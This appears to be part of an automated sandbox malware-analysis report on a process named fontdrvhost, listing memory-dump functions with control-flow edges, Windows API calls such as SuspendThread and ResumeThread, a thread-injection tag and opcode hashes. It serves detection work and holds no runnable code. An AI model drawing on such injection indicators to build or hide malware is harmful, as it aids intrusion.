384->394 395 7ffd9c107b08-7ffd9c107b0d 386->395 390->324 390->325 396 7ffd9c107b5c-7ffd9c107b7b 394->396 397 7ffd9c107b90 394->397 395->381 398 7ffd9c107b0e 395->398 402 7ffd9c107bec-7ffd9c107bfd 396->402 403 7ffd9c107b7d-7ffd9c107b81 396->403 397->384 399 7ffd9c107b92 397->399 398->382 401 7ffd9c107bac-7ffd9c107bbd 399->401 407 7ffd9c107c07-7ffd9c107c0b 401->407 408 7ffd9c107bbf-7ffd9c107bcd 401->408 405 7ffd9c107bfe-7ffd9c107c01 402->405 403->395 409 7ffd9c107b83 403->409 405->407 412 7ffd9c107c0d-7ffd9c107c0f 407->412 410 7ffd9c107bcf-7ffd9c107bd3 408->410 411 7ffd9c107c3e-7ffd9c107c53 408->411 409->397 410->394 418 7ffd9c107bd5 410->418 414 7ffd9c107c59-7ffd9c107c61 411->414 412->414 415 7ffd9c107c11-7ffd9c107c1f 412->415 416 7ffd9c107cab-7ffd9c107cb3 414->416 417 7ffd9c107c63-7ffd9c107c6c 414->417 419 7ffd9c107c21-7ffd9c107c25 415->419 420 7ffd9c107c90-7ffd9c107ca5 415->420 423 7ffd9c107d3b-7ffd9c107d49 416->423 424 7ffd9c107cb9-7ffd9c107cd2 416->424 421 7ffd9c107c6f-7ffd9c107c71 417->421 418->402 419->401 427 7ffd9c107c27 419->427 420->416 425 7ffd9c107c73-7ffd9c107c75 421->425 426 7ffd9c107ce2-7ffd9c107ce4 421->426 428 7ffd9c107d4b-7ffd9c107d4d 423->428 429 7ffd9c107dba-7ffd9c107dbb 423->429 424->423 430 7ffd9c107cd4-7ffd9c107cd5 424->430 432 7ffd9c107c77 425->432 433 7ffd9c107cf1-7ffd9c107cf5 425->433 439 7ffd9c107ce5-7ffd9c107ce7 426->439 427->411 435 7ffd9c107dc9-7ffd9c107dcb 428->435 436 7ffd9c107d4f 428->436 434 7ffd9c107deb-7ffd9c107ded 429->434 437 7ffd9c107cd6-7ffd9c107ce0 430->437 432->405 440 7ffd9c107c79 432->440 441 7ffd9c107cf7 433->441 442 7ffd9c107d71-7ffd9c107d8b 433->442 443 7ffd9c107def 434->443 444 7ffd9c107e5e-7ffd9c107e87 434->444 445 7ffd9c107e3c 435->445 446 7ffd9c107dcd-7ffd9c107dcf 435->446 436->437 438 7ffd9c107d51 436->438 437->426 449 7ffd9c107d58-7ffd9c107d5c 438->449 462 7ffd9c107d68-7ffd9c107d70 439->462 463 7ffd9c107ce8 439->463 451 7ffd9c107c7e-7ffd9c107c84 440->451 441->451 453 7ffd9c107cf9 441->453 473 7ffd9c107dbd-7ffd9c107dc6 442->473 474 7ffd9c107d8d-7ffd9c107d9b 442->474 454 7ffd9c107e0c-7ffd9c107e1a 443->454 444->376 455 7ffd9c107e3e-7ffd9c107e40 445->455 456 7ffd9c107ead-7ffd9c107eba 445->456 447 7ffd9c107e4b-7ffd9c107e4f 446->447 448 7ffd9c107dd1 446->448 458 7ffd9c107ecb 447->458 459 7ffd9c107e51 447->459 448->449 457 7ffd9c107dd3 448->457 460 7ffd9c107dd8-7ffd9c107dde 449->460 461 7ffd9c107d5e 449->461 466 7ffd9c107d00-7ffd9c107d25 451->466 472 7ffd9c107c86 451->472 453->466 467 7ffd9c107e1b-7ffd9c107e25 454->467 455->390 468 7ffd9c107e42 455->468 456->390 457->460 458->324 459->460 470 7ffd9c107e53 459->470 479 7ffd9c107e5a-7ffd9c107e5d 460->479 480 7ffd9c107de0 460->480 461->439 471 7ffd9c107d60 461->471 462->442 463->421 476 7ffd9c107ce9-7ffd9c107cea 463->476 486 7ffd9c107d28-7ffd9c107d39 466->486 477 7ffd9c107e27-7ffd9c107e3a 467->477 468->435 469 7ffd9c107e44 468->469 469->447 470->479 471->462 472->412 481 7ffd9c107c88 472->481 473->435 474->454 482 7ffd9c107d9d-7ffd9c107d9f 474->482 476->433 477->445 479->444 480->477 485 7ffd9c107de2-7ffd9c107dea 480->485 481->420 482->467 484 7ffd9c107da1 482->484 484->486 488 7ffd9c107da3 484->488 485->434 486->423 486->430 488->429
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3caaf633ffc53242918a7d856e32bfaadc8e49c2f9bca6e28a6defc55a1dda08
                                                                    • Instruction ID: fbc148526f487d8ea8aed686b4759d3742d29ff3c4f53435aecade28732f52ec
                                                                    • Opcode Fuzzy Hash: 3caaf633ffc53242918a7d856e32bfaadc8e49c2f9bca6e28a6defc55a1dda08
                                                                    • Instruction Fuzzy Hash: B3521531B0CA4E8FEBA9DB58C865AB977F1FF45350F1001B9D04ED7292DA25AC42CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20DA8 Relevance: .3, Instructions: 301COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 814 7ffd9ba20da8-7ffd9ba20dbf 815 7ffd9ba20dc2-7ffd9ba20df9 814->815 816 7ffd9ba20dc1 814->816 818 7ffd9ba20e00-7ffd9ba20eb7 call 7ffd9ba207d0 815->818 819 7ffd9ba20dfb 815->819 816->815 832 7ffd9ba20ecf-7ffd9ba20fa8 818->832 833 7ffd9ba20eb9-7ffd9ba20ece 818->833 819->818 846 7ffd9ba20fc0-7ffd9ba20fc1 832->846 847 7ffd9ba20faa-7ffd9ba20fb0 832->847 833->832 848 7ffd9ba20fb2 846->848 849 7ffd9ba20fc3-7ffd9ba20fc9 846->849 847->848 850 7ffd9ba20fb4-7ffd9ba20fbe 848->850 851 7ffd9ba20fcc-7ffd9ba20fe3 848->851 849->851 850->846 854 7ffd9ba20feb-7ffd9ba210dc 851->854
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c71f79bdefe3423725ac78f1f0ad485dd33c40345125345868f4371ec32abc66
                                                                    • Instruction ID: 3e243ba7ce47fb957f2f87563f069b936bbc1b8e42037c2b20a274d7619774de
                                                                    • Opcode Fuzzy Hash: c71f79bdefe3423725ac78f1f0ad485dd33c40345125345868f4371ec32abc66
                                                                    • Instruction Fuzzy Hash: B1A1E371A09A8D8FE7A8EB6CC8657A97FE2FF55310F0001BAD049D72E6CB791811CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA20B47 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9
                                                                    • API String ID: 0-3254877420
                                                                    • Opcode ID: 3389574b12815a7c11987d733a4392b3c250553830cfec1bfa945948d44555d9
                                                                    • Instruction ID: 504049a18656693036e9811987a921c2186eb7f244c306dc473f1cd805bc8c44
                                                                    • Opcode Fuzzy Hash: 3389574b12815a7c11987d733a4392b3c250553830cfec1bfa945948d44555d9
                                                                    • Instruction Fuzzy Hash: 9B11DF32A2864E8FCB55EF6CE8915E977A0FB59325F0101B6E849D3260D730A565CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBE02F9 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: c30b0b55c3dac96b62d21cab9e8402357d58aa5ae3c28b2b1e37b178af2e1579
                                                                    • Instruction ID: a384092ee6946d0d148dc75768c520047534c2519d862ce3d869dff1829ce233
                                                                    • Opcode Fuzzy Hash: c30b0b55c3dac96b62d21cab9e8402357d58aa5ae3c28b2b1e37b178af2e1579
                                                                    • Instruction Fuzzy Hash: D0417070D0865C8FDB59DF98D895BECBBF0FF5A310F1041AAD049D7292DA74A845CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBDEAAD Relevance: 1.6, APIs: 1, Instructions: 141threadinjectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 18 7ffd9bbdeaad-7ffd9bbdeab9 19 7ffd9bbdeabb-7ffd9bbdeac3 18->19 20 7ffd9bbdeac4-7ffd9bbdeb92 SuspendThread 18->20 19->20 24 7ffd9bbdeb9a-7ffd9bbdebe4 20->24 25 7ffd9bbdeb94 20->25 25->24
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: SuspendThread
                                                                    • String ID:
                                                                    • API String ID: 3178671153-0
                                                                    • Opcode ID: b3346826dec1adc2bb6d5d7149f84e6ddea0c0a7f0f4f65cbd4942d5ed6ce37f
                                                                    • Instruction ID: 20d975b224b5392af9e62a0830b38d0a3788364267f99dec587e471131481e51
                                                                    • Opcode Fuzzy Hash: b3346826dec1adc2bb6d5d7149f84e6ddea0c0a7f0f4f65cbd4942d5ed6ce37f
                                                                    • Instruction Fuzzy Hash: 72416C74E0864D8FDF58DFA8D894AEDBBF0FB5A310F10416AD44AE7292DA34A845CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBE1F85 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 28 7ffd9bbe1f85-7ffd9bbe2063 GetFileAttributesW 32 7ffd9bbe206b-7ffd9bbe20a9 28->32 33 7ffd9bbe2065 28->33 33->32
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 1238ea99bd6467ef5660219bc2e18ff51e657dfa9d2ecaedc04ae494cac88961
                                                                    • Instruction ID: fbd7e0f52c8a8011ce2196cc4a976dee90938b196a75f3436cdffdd04731f6a8
                                                                    • Opcode Fuzzy Hash: 1238ea99bd6467ef5660219bc2e18ff51e657dfa9d2ecaedc04ae494cac88961
                                                                    • Instruction Fuzzy Hash: 95410A70E08A1C8FDB98EF98D495BEDBBF0FB59310F14416AD009E7252DA71A885CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBE01DF Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 35 7ffd9bbe01df-7ffd9bbe02a2 ResumeThread 38 7ffd9bbe02aa-7ffd9bbe02f4 35->38 39 7ffd9bbe02a4 35->39 39->38
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1855998458.00007FFD9BBD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9bbd0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: a706e3d5b977a6e42b1e333905c1a90876708b2b536ca9622142670172f97e01
                                                                    • Instruction ID: 484be65edacced63bc4e5209014031d3a2e9fc4fb25c1a68e4fd6c6c04f1b7ef
                                                                    • Opcode Fuzzy Hash: a706e3d5b977a6e42b1e333905c1a90876708b2b536ca9622142670172f97e01
                                                                    • Instruction Fuzzy Hash: 8A41F870E08A1C8FDB98EF98D899BEDBBF0FB59310F10416AD409E7251DA71A885CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10B3F8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 632c56feca1157a80622e8f3af5e15c6041bfa3024f0a3dae6e12b56a7ba4d8e
                                                                    • Instruction ID: 4755c893b863e0b682291c60720f03b5116f831dd53c6e882ae8d56065c136d5
                                                                    • Opcode Fuzzy Hash: 632c56feca1157a80622e8f3af5e15c6041bfa3024f0a3dae6e12b56a7ba4d8e
                                                                    • Instruction Fuzzy Hash: 2F515C32E0860A8FDB69DF98C4A05BDB7B1FF58340F1041BED41AEB2D6DA346941CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA216D3 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 78 7ffd9ba216d3-7ffd9ba3fad5 84 7ffd9ba3fad7 78->84 85 7ffd9ba3fadc-7ffd9ba3fae1 call 7ffd9ba216e0 78->85 84->85 87 7ffd9ba3fae6-7ffd9ba3faf1 85->87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1850668071.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9ba20000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -L_^
                                                                    • API String ID: 0-3144474931
                                                                    • Opcode ID: 38a975c46803fa4c72b62f73b7463cf418a0d7950dca1a6254cb732688fc197d
                                                                    • Instruction ID: 7fe31a6308b206abafd9baa3e8b47b18e8f0610588be34f220b9adc661a6b0f8
                                                                    • Opcode Fuzzy Hash: 38a975c46803fa4c72b62f73b7463cf418a0d7950dca1a6254cb732688fc197d
                                                                    • Instruction Fuzzy Hash: 7F012B31B1E24A9FD711FFB8EDA19ED7BA0EF01324F080172E45DC2093E9256618C381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10D117 Relevance: 1.2, Instructions: 1197COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 88 7ffd9c10d117-7ffd9c10d119 89 7ffd9c10d149 88->89 90 7ffd9c10d11b-7ffd9c10d122 88->90 93 7ffd9c10d1be-7ffd9c10d1c2 89->93 94 7ffd9c10d14b-7ffd9c10d19f 89->94 91 7ffd9c10d101-7ffd9c10ffa9 90->91 92 7ffd9c10d124-7ffd9c10d12e 90->92 110 7ffd9c10fee7-7ffd9c10feea 91->110 111 7ffd9c10feec-7ffd9c10ffae 91->111 92->89 95 7ffd9c10d1a1-7ffd9c10d1a6 93->95 96 7ffd9c10d1c4-7ffd9c10d1c9 93->96 94->95 99 7ffd9c10d1a9-7ffd9c10d1bc 95->99 96->99 100 7ffd9c10d1cc-7ffd9c10d1d9 96->100 99->93 103 7ffd9c10d24d-7ffd9c10d24f 100->103 104 7ffd9c10d1db-7ffd9c10d1e1 100->104 118 7ffd9c10d251-7ffd9c10d272 103->118 108 7ffd9c10d20a 104->108 115 7ffd9c10d1e9-7ffd9c10d1f0 108->115 116 7ffd9c10d20b-7ffd9c10d212 108->116 112 7ffd9c10ff05-7ffd9c10ff1a 110->112 111->112 119 7ffd9c10ff51-7ffd9c10ff7d 112->119 120 7ffd9c10ff1c-7ffd9c10ff4f 112->120 121 7ffd9c110d80-7ffd9c110dbb 115->121 122 7ffd9c10d1f1-7ffd9c10d209 116->122 123 7ffd9c10d214-7ffd9c10d24a 116->123 142 7ffd9c10d274-7ffd9c10d34f 118->142 133 7ffd9c10ff7f-7ffd9c10ff92 119->133 134 7ffd9c10ffb3-7ffd9c10ffe5 119->134 120->119 126 7ffd9c110dc0-7ffd9c110dc7 121->126 122->108 123->103 126->126 131 7ffd9c110dc9-7ffd9c111156 126->131 140 7ffd9c116540-7ffd9c116576 131->140 138 7ffd9c10ff94 133->138 139 7ffd9c10ff99-7ffd9c10ffa8 133->139 148 7ffd9c10ffed-7ffd9c110294 134->148 149 7ffd9c10ffe7-7ffd9c10ffeb 134->149 138->139 152 7ffd9c116577 140->152 162 7ffd9c10d351-7ffd9c10d372 142->162 148->121 149->148 152->152 166 7ffd9c10d374-7ffd9c10d44f 162->166 178 7ffd9c10d451-7ffd9c10d472 166->178 182 7ffd9c10d474-7ffd9c10d641 178->182 207 7ffd9c10d6b1-7ffd9c10d6d9 182->207 208 7ffd9c10d643-7ffd9c10d6af 182->208 217 7ffd9c10d748-7ffd9c10d7d9 207->217 218 7ffd9c10d6db-7ffd9c10d746 207->218 208->207 249 7ffd9c10d847-7ffd9c10d849 217->249 250 7ffd9c10d7db-7ffd9c10d845 217->250 218->217 251 7ffd9c10d8b7-7ffd9c10d8d9 249->251 252 7ffd9c10d84b-7ffd9c10d859 249->252 250->249 258 7ffd9c10d946-7ffd9c10d955 251->258 259 7ffd9c10d8db-7ffd9c10d8f1 251->259 260 7ffd9c10d87f-7ffd9c10d891 252->260 261 7ffd9c10d85b-7ffd9c10d891 252->261 281 7ffd9c10d957-7ffd9c10d980 258->281 266 7ffd9c10d8f3-7ffd9c10d8f9 259->266 267 7ffd9c10d917-7ffd9c10d929 259->267 260->251 270 7ffd9c10d893-7ffd9c10d8b5 260->270 261->251 261->270 279 7ffd9c10d94f-7ffd9c10d955 267->279 280 7ffd9c10d92b-7ffd9c10d941 267->280 270->251 279->281 294 7ffd9c10d9ae-7ffd9c10dacf 280->294 295 7ffd9c10d943 280->295 281->140 315 7ffd9c10dad1-7ffd9c10dad5 call 7ffd9c108ca0 294->315 295->258 317 7ffd9c10dada 315->317 319 7ffd9c10dadc-7ffd9c10daf3 317->319 320 7ffd9c10daf9-7ffd9c10dafd 319->320 320->140 321 7ffd9c10daac-7ffd9c10dac1 320->321
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 607ea52f930707a31f123ce9ed9e4dd1b6c637e0b80dfbfdca710cdf63c115da
                                                                    • Instruction ID: c76fac6efdaa5f03860f9d2b88e58115e6d9af22247565b2df4f2bc4d6f457cf
                                                                    • Opcode Fuzzy Hash: 607ea52f930707a31f123ce9ed9e4dd1b6c637e0b80dfbfdca710cdf63c115da
                                                                    • Instruction Fuzzy Hash: 59821B23B0D6975BF715FBACA8B64E57BF0EF02354B0801B7D49E8A0D3DD1A64498389
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C1006B1 Relevance: .4, Instructions: 409COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 489 7ffd9c1006b1 490 7ffd9c1006b6-7ffd9c1006be 489->490 491 7ffd9c1006c4-7ffd9c1006d6 call 7ffd9c100080 490->491 492 7ffd9c100841-7ffd9c100855 490->492 497 7ffd9c1006d8-7ffd9c1006dd 491->497 498 7ffd9c1006a5-7ffd9c1006ac 491->498 493 7ffd9c10085c-7ffd9c100867 492->493 494 7ffd9c100857 492->494 494->493 500 7ffd9c1006ff-7ffd9c100710 497->500 501 7ffd9c1006df-7ffd9c1006e3 497->501 499 7ffd9c100880-7ffd9c100885 498->499 499->489 504 7ffd9c10088a-7ffd9c1008a5 500->504 505 7ffd9c100716-7ffd9c10072b 500->505 502 7ffd9c1006e9-7ffd9c1006fa 501->502 503 7ffd9c1007e3-7ffd9c1007f4 501->503 502->492 507 7ffd9c1007fb-7ffd9c100806 503->507 508 7ffd9c1007f6 503->508 512 7ffd9c1008a7 504->512 513 7ffd9c1008ad 504->513 505->504 506 7ffd9c100731-7ffd9c10073d 505->506 510 7ffd9c10073f-7ffd9c100756 506->510 511 7ffd9c10076e-7ffd9c100784 call 7ffd9c100080 506->511 508->507 510->503 520 7ffd9c10075c-7ffd9c10076b 510->520 511->503 521 7ffd9c100786-7ffd9c100791 511->521 512->513 515 7ffd9c1008b1-7ffd9c100913 513->515 516 7ffd9c1008af 513->516 533 7ffd9c1008db-7ffd9c100917 515->533 534 7ffd9c10091e-7ffd9c10093c 515->534 516->515 520->511 521->504 523 7ffd9c100797-7ffd9c1007ac 521->523 523->504 526 7ffd9c1007b2-7ffd9c1007c5 523->526 527 7ffd9c100819-7ffd9c100821 526->527 528 7ffd9c1007c7-7ffd9c1007e1 526->528 532 7ffd9c100829-7ffd9c10082c 527->532 528->503 535 7ffd9c100807-7ffd9c100816 528->535 536 7ffd9c100833-7ffd9c10083b 532->536 547 7ffd9c1008f5-7ffd9c100910 533->547 548 7ffd9c10093e-7ffd9c100970 533->548 535->527 536->492 539 7ffd9c10067a-7ffd9c100687 536->539 539->536 543 7ffd9c10068d-7ffd9c1006a1 539->543 543->536 551 7ffd9c100a58-7ffd9c100a5d 548->551 555 7ffd9c10098c-7ffd9c100a67 551->555 556 7ffd9c100a71-7ffd9c100a8f 551->556 564 7ffd9c1009b6-7ffd9c1009b9 555->564 565 7ffd9c100a3d-7ffd9c100a55 555->565 564->565 567 7ffd9c1009bf-7ffd9c1009c2 564->567 565->551 568 7ffd9c100a2b-7ffd9c100a32 567->568 569 7ffd9c1009c4-7ffd9c1009f1 567->569 570 7ffd9c100a34-7ffd9c100a3c 568->570 571 7ffd9c1009f2-7ffd9c100a0c 568->571 572 7ffd9c100a12-7ffd9c100a1d 571->572 573 7ffd9c100a91-7ffd9c100ae1 571->573 572->573 575 7ffd9c100a1f-7ffd9c100a29 572->575 575->568
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 154b963bd9bd1744b1bd7b9c2077b8d9ad14029e17b2aaa378e7e31fcb610d6c
                                                                    • Instruction ID: ed49746e34aa79cc999cf7b2351185a3f08de1987ef98aa92e69687969329be7
                                                                    • Opcode Fuzzy Hash: 154b963bd9bd1744b1bd7b9c2077b8d9ad14029e17b2aaa378e7e31fcb610d6c
                                                                    • Instruction Fuzzy Hash: 0BE1DF32A0DA478FE378DB68D4A15B577F1FF44340B94457EC48E836A2DE29B8428B85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10B66F Relevance: .4, Instructions: 362COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 583 7ffd9c10b66f-7ffd9c10b682 584 7ffd9c10b6ce-7ffd9c10b6e4 583->584 585 7ffd9c10b684-7ffd9c10b9c5 583->585 587 7ffd9c10b774-7ffd9c10b7a4 584->587 588 7ffd9c10b6ea-7ffd9c10b6f2 584->588 589 7ffd9c10b9cf-7ffd9c10ba0e 585->589 599 7ffd9c10b84e-7ffd9c10b857 587->599 600 7ffd9c10b7aa-7ffd9c10b7ab 587->600 588->589 590 7ffd9c10b6f8-7ffd9c10b70a 588->590 598 7ffd9c10ba10 589->598 590->589 592 7ffd9c10b710-7ffd9c10b727 590->592 593 7ffd9c10b767-7ffd9c10b76e 592->593 594 7ffd9c10b729-7ffd9c10b730 592->594 593->587 593->588 594->589 597 7ffd9c10b736-7ffd9c10b764 594->597 597->593 604 7ffd9c10ba1b-7ffd9c10bab1 598->604 601 7ffd9c10b85d-7ffd9c10b863 599->601 602 7ffd9c10b98f-7ffd9c10b99d 599->602 603 7ffd9c10b7ae-7ffd9c10b7c4 600->603 601->589 605 7ffd9c10b869-7ffd9c10b878 601->605 607 7ffd9c10b99f 602->607 608 7ffd9c10b9a4-7ffd9c10b9b5 602->608 603->589 606 7ffd9c10b7ca-7ffd9c10b7ee 603->606 617 7ffd9c10ba36-7ffd9c10bab6 604->617 618 7ffd9c10babc-7ffd9c10baff 604->618 610 7ffd9c10b87e-7ffd9c10b885 605->610 611 7ffd9c10b982-7ffd9c10b989 605->611 612 7ffd9c10b7f0-7ffd9c10b813 call 7ffd9c104318 606->612 613 7ffd9c10b841-7ffd9c10b848 606->613 607->608 610->589 614 7ffd9c10b88b-7ffd9c10b897 call 7ffd9c104318 610->614 611->601 611->602 612->589 623 7ffd9c10b819-7ffd9c10b83f 612->623 613->599 613->603 622 7ffd9c10b89c-7ffd9c10b8a7 614->622 617->618 628 7ffd9c10ba58-7ffd9c10bab8 617->628 630 7ffd9c10bb01-7ffd9c10bc07 618->630 624 7ffd9c10b8e6-7ffd9c10b8f5 622->624 625 7ffd9c10b8a9-7ffd9c10b8c0 622->625 623->612 623->613 624->589 631 7ffd9c10b8fb-7ffd9c10b91f 624->631 625->589 629 7ffd9c10b8c6-7ffd9c10b8e2 625->629 628->618 639 7ffd9c10ba7c-7ffd9c10baba 628->639 629->625 633 7ffd9c10b8e4 629->633 658 7ffd9c10bd37-7ffd9c10bd54 630->658 659 7ffd9c10bcec-7ffd9c10c059 630->659 635 7ffd9c10b922-7ffd9c10b93f 631->635 637 7ffd9c10b962-7ffd9c10b978 633->637 635->589 636 7ffd9c10b945-7ffd9c10b960 635->636 636->635 636->637 637->589 640 7ffd9c10b97a-7ffd9c10b97e 637->640 639->618 646 7ffd9c10ba9d-7ffd9c10bab0 639->646 640->611 661 7ffd9c10c061-7ffd9c10c0c8 658->661 662 7ffd9c10bd5a-7ffd9c10bd69 658->662 659->661 667 7ffd9c10c238 661->667 662->659 663 7ffd9c10bd6b-7ffd9c10bd6f 662->663 663->630 664 7ffd9c10bd75 663->664 666 7ffd9c10bdf3-7ffd9c10be00 664->666 668 7ffd9c10be06-7ffd9c10bf66 666->668 669 7ffd9c10bd77-7ffd9c10bd8f 666->669 667->667 669->666 671 7ffd9c10bd92 call 7ffd9c10ba00 669->671 671->666
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.1867212775.00007FFD9C100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9c100000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0c8c0d2066046c735205ff8606dabce9f2b57ee2ce73f56c15d1122c961bdcc
                                                                    • Instruction ID: 46d8dc2cd4f3c1ac1279445dc20dfda349cefd4a898fc1f500a4dd525f825d44
                                                                    • Opcode Fuzzy Hash: d0c8c0d2066046c735205ff8606dabce9f2b57ee2ce73f56c15d1122c961bdcc
                                                                    • Instruction Fuzzy Hash: F7D1BE716189168FEB58CF58C4E16B437B1FF49350B5446BDC85A8B68BCA38F8C2CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10B68F Relevance: .3, Instructions: 333COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
